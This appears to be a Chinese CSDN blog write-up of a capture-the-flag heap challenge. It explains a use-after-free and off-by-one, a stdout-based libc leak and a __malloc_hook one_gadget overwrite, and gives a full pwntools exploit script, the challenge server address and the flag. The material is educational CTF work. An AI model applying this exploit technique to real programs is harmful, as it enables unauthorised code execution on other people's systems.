[uaf + off by one -> stdout leak libc] 长城杯pwn1

最新推荐文章于 2023-03-18 17:45:35 发布
最新推荐文章于 2023-03-18 17:45:35 发布
阅读量441 收藏 1
点赞数
分类专栏: CTF 文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huzai9527/article/details/120413245
版权

1. ida分析

  1. 存在uaf 和 off by one,可以实现任意地址写
  2. 没有show函数,且保护全开,不能修改got表

2. 思路

  1. 使用stdout爆破,泄漏libc
  2. 先申请几个chunk,通过off by one,构造chunk lapping
  3. 再通过uaf修改fd,构成任意地址写
  4. 注意点就是,想法设法构造chunk复用
  5. uaf + off by one 总结一下就是,先del构造fastbin,再改chunk head构造unstored bin,再申请一个不是fastbin大小的chunk覆盖fastbin,修改fastbin的fd造成任意地址写

3. exp

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from pwn import *
from LibcSearcher import *
s       = lambda data               :sh.send(data)
sa      = lambda delim,data         :sh.sendafter(delim, data)
sl      = lambda data               :sh.sendline(data)
sla     = lambda delim,data         :sh.sendlineafter(delim, data)
r       = lambda numb=4096          :sh.recv(numb)
ru      = lambda delims, drop=False :sh.recvuntil(delims, drop)
rl      = lambda                    :sh.recvline()
irt     = lambda                    :sh.interactive()
pinfo   = lambda name,addr          :log.success('{} : {:#x}'.format(name, addr))

context(log_level = 'debug', arch = 'amd64')

elf = ELF('./pwn')
DEBUG = 1

if DEBUG:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    sh = process('./pwn')
else:
    IP = '47.104.175.110'
    PORT = '20066'
    libc = ELF('./libc.so.6')
    sh = remote(IP,PORT)


def add(idx,size):
    sla('>> ','1')
    sla('index:',str(idx))
    sla('size:',str(size))

def dele(idx):
    sla('>> ','2')
    sla('index:',str(idx))

def edit(idx,con):
    sla('>> ','3')
    sla('index:', str(idx))
    sa('context:',con)
def debug():
    gdb.attach(sh)
    pause()

def pwn():
    add(0,0x18)
    add(1,0x68)
    add(2,0x68)
    add(3,0x10)
    
    dele(1)
    edit(0,'a'*0x18 + '\xe1') #2.23 改完之后可以double free
    dele(1)
    
    add(1,1)
    edit(1,'\xdd\x25') #改 fd 为 stdout 爆破地址
    edit(0,'a'*0x18 + '\x71')

    add(4,0x68)
    add(5,0x68)
    edit(5,'a' * 0x33 + p64(0xfbad1800) + p64(0) * 3 + p8(0x58)+'\n')
    stdout = u64(ru('\x7f')[-6:].ljust(8,'\x00')) - 131
    libc.address = stdout - libc.sym['_IO_2_1_stdout_']
    pinfo("libc.address",libc.address) #爆破泄漏 libc地址
    dele(2)
    add(6,0xb0)
    edit(6,'a'*0x48 + p64(0x71) + p64(libc.sym['__malloc_hook']-0x23)*2+'\n') #打malloc hook
    add(7,0x60)
    add(7,0x60)
    edit(7,'a'*0xb + p64(libc.address + 0x4527a)+p64(libc.sym['realloc']+11)+'\n')# 通过realloc调整rsp满足onegadget条件
    debug()
    add(8,0x88)
    
    irt()
'''
0x45226 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL
0x4527a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf03a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1247 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL

'''


if __name__ == '__main__':
    while True:
        try:
            pwn()
        except EOFError as e: 
            print("error,try again.")
            sh.close()
            sh = process('./pwn')
            #sh = remote(IP,PORT)
#flag{a3a6d84e-30b3-41ce-a6bc-158e2a975f73}
huzai9527
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn题堆利用的一些姿势 -- IO_FILE
lifanxin的博客
05-11 5185
IO_FILE概述IO_FILE结构介绍利用IO_FILE进行leakFSOP总结 概述   这是pwn题堆利用系列的第三篇文章,本篇文章主要讲解一下IO_FILE结构在pwn题中的利用。一般来说,想到使用IO_FILE结构,是因为pwn题中没有可以用来leak的函数。 IO_FILE结构介绍   FILE 在 Linux 系统的标准 IO 库中是用于描述文件的结构,称为文件流。 FILE 结构在程序执行 fopen 等函数时会进行创建,并分配在堆中,然后以链表的形式串联起来,但系统一开始创建的三个文件st
CTF泄漏libc基址的方法
liucc09的博客
01-05 3992
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
【buu刷题】ciscn_2019_final_3
m0_73756460的博客
03-18 350
【buu刷题】ciscn_2019_final_3 write up
linux 堆利用
sky123博客
02-18 5007
堆利用 Unlink 假设正常情况下,每申请一个 chunk 会保存一个指向该 chunk 内存块的指针。 在 chunk1 中构造 fake chunk ,需要注意: 为了绕过 if (__builtin_expect(FD->bk != P || BK->fd != P, 0)) malloc_printerr(check_action, "corrupted double-linked list", P, AV); 令: fake
通过给的libc泄露函数地址
zszcr的博客
03-22 5476
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
DSP中的浅析通用有源滤波器UAF42的CAD软件-FILTER42
10-23
通用有源滤波器UAF42是BB公司利用它具有集成度高、可靠性高和设计灵活的特点,使得计算机辅助设计软件还可以提高UAF42有源滤波器的设计效率。  1 概述  滤波器:对输入信号中某特定频率或频带成分具有选择性的...
uaf42.zip_uaf42_uaf42 design_uaf42-data
09-23
标题中的“uaf42.zip_uaf42_uaf42 design_uaf42-data”表明这是一份关于“uaf42”设计的压缩文件,重点在于“uaf42”的设计及其相关数据。描述中提到的是使用“uaf42”设计的有源滤波器,并记录了高通滤波器的设计...
程控滤波(DAC8811+UAF42+ADG5234)Altium设计 硬件原理图+PCB文件.rar
03-21
程控滤波(DAC8811+UAF42+ADG5234)Altium设计 硬件原理图+PCB文件,,Altium Designer 设计的工程文件,包括原理图及PCB文件,可以用Altium(AD)软件打开或修改,可作为你产品设计的参考。
KW-UAF42-模块用户手册-简易_V1.1.pdf
最新发布
03-22
根据提供的文件信息,我们可以深入解析并提取出与KW-UAF42模块相关的多个知识点: ### 1. KW-UAF42模块概述 KW-UAF42模块是由康威科技开发的一种有源滤波器模块。该模块具备低通、高通、带通滤波功能,用户可以...
uaf-for-incose
12-11
UAF is the next generation of the Unified Profile for DoDAF and MoDAF (UPDM) At one time referred to as UPDM 3 Longer Answer: An enterprise architecture framework Applicable for domains similar to ...
快速入门堆溢出技巧(OFF BY ONE)
wulanlin的博客
01-11 620
OFF BY ONE 所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节 并且堆块的fd(前驱指针)以及bk(后继指针)都会指向 main_arena+88的地址这也是我们泄露出来的地址 利用gdb 输入libc查看基地址,main_arena+88-libc=offset UNSORTERBIN&FASTBINS 在堆块的bins中分为fastbins,largebins,smallbins还有今天要用
长城杯2021 pwn
清霂的博客
09-20 811
长城杯20211.K1ng_in_h3Ap_I2.K1ng_in_h3Ap_II 菜鸡第一次在国内比赛做出两道题,害,长城杯比第五空间温柔多了,第五空间一道rop,之后就直接vm,musl都没学过,还有个c++逆向8出来。打完国赛(写了一道简单堆题,orw调一晚上没出来,服了)之后划水时间太长了,8月下旬才开始继续学堆,争取10月底前把vm,musl,mips,arm这种其他架构(不知道算不算)的pwn学习一下。 1.K1ng_in_h3Ap_I 题目给了3个字节libc地址,操作性还是挺强的,借用残留指针
2021 长城杯 pwn K1ng_in_h3Ap_I
yongbaoii的博客
09-24 360
libc是2.23 菜单 add free 显然是有uaf。 edit 就是输入 输入函数其实还有off by one。 有个后门 我们的思路就是简单的说因为有uaf但是没有show,所以我们就直接攻击stdout,但是又因为后门给了我们地址,所以就解决了爆破这个问题。然后就攻击IO_FILE泄露libc,再攻击malloc_hook就好啦。 第一个exp是利用off by one来构造的。 exp from pwn import * r = process("./pwn1") context.a
BUUCTF SROP UAF House of Force 修改free_got为system 静态链接
carol2358的博客
07-12 463
ciscn_2019_es_7 ciscn_2019_es_7 贴张表: ip是接下去要干的,sp是这里干完接下来要干的地址(大概XD) 怎么找binsh看我之前这篇: https://blog.csdn.net/carol2358/article/details/105643009 rsi 当然直接调试找也是可以的 exp: from pwn import * from LibcSearcher import * local_file = './ciscn_2019_es_7' loca
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc
weixin_44145820的博客
04-17 1886
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
libc泄露以及偏移
RKAnjia的博客
03-23 659
payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+ p32(write_plt) + p32(start)(返回地址) + p32(1)+ p32(write_got)+p32(4) 后面三个是write函数的参数 write(1,‘write_got’,4) 4代表输出4个字节,write_got则为要泄露的地址 write函数原型是write(fd, addr, len),即将addr作为起始地址,读取len字节的数据到文件流fd(0表示标准输入流stdin、1表示标准输出流s
buuctf realloc _IO_2_1_stdout_泄露libc地址 32位格式化字符串 UAF diff SSH SCP jmp-rsp orw seccomp_tools
carol2358的博客
08-01 739
文章目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic 贴几个链接: https://blog.csdn.net/weixin_44145820/article/details/105585889 https://blog.csdn.net/seaaseesa/article/details/105590591 https://blog.csdn.net/weixin_42151611/article/details/99228675 exp:
2021长城杯pwn部分wp
eeeeeight的博客
09-19 6023
前言: 就, 除了vmpwn都是基础glibc的heap题 king_in_heap_1: delete函数没有把free后的指针置零, 存在uaf, 然后用unsortedbin的fd指向io结构体泄露libc, 然后mallochook上用realloc调整一下, 打onegadget就完事了 #!/usr/bin/env python # coding=utf-8 from pwn import * sh=remote('47.104.175.110',20066) #sh=process('./ki
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1320
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
uaf pwn hacknote
09-26
根据提供的引用内容,hacknote程序存在Use After Free(UAF)漏洞。UAF是一种内存安全漏洞,它发生在程序试图使用已经被释放的内存区域时。在hacknote程序中,delete_note函数中释放了note对象的内存,但没有将对应的指针设置为NULL。这就导致在之后的操作中,如果再次访问已释放的内存,就会发生UAF漏洞。 攻击者可以利用UAF漏洞来实现攻击,例如修改已经被释放的内存中的内容,控制程序的执行流程,实现任意代码执行、信息泄露等攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值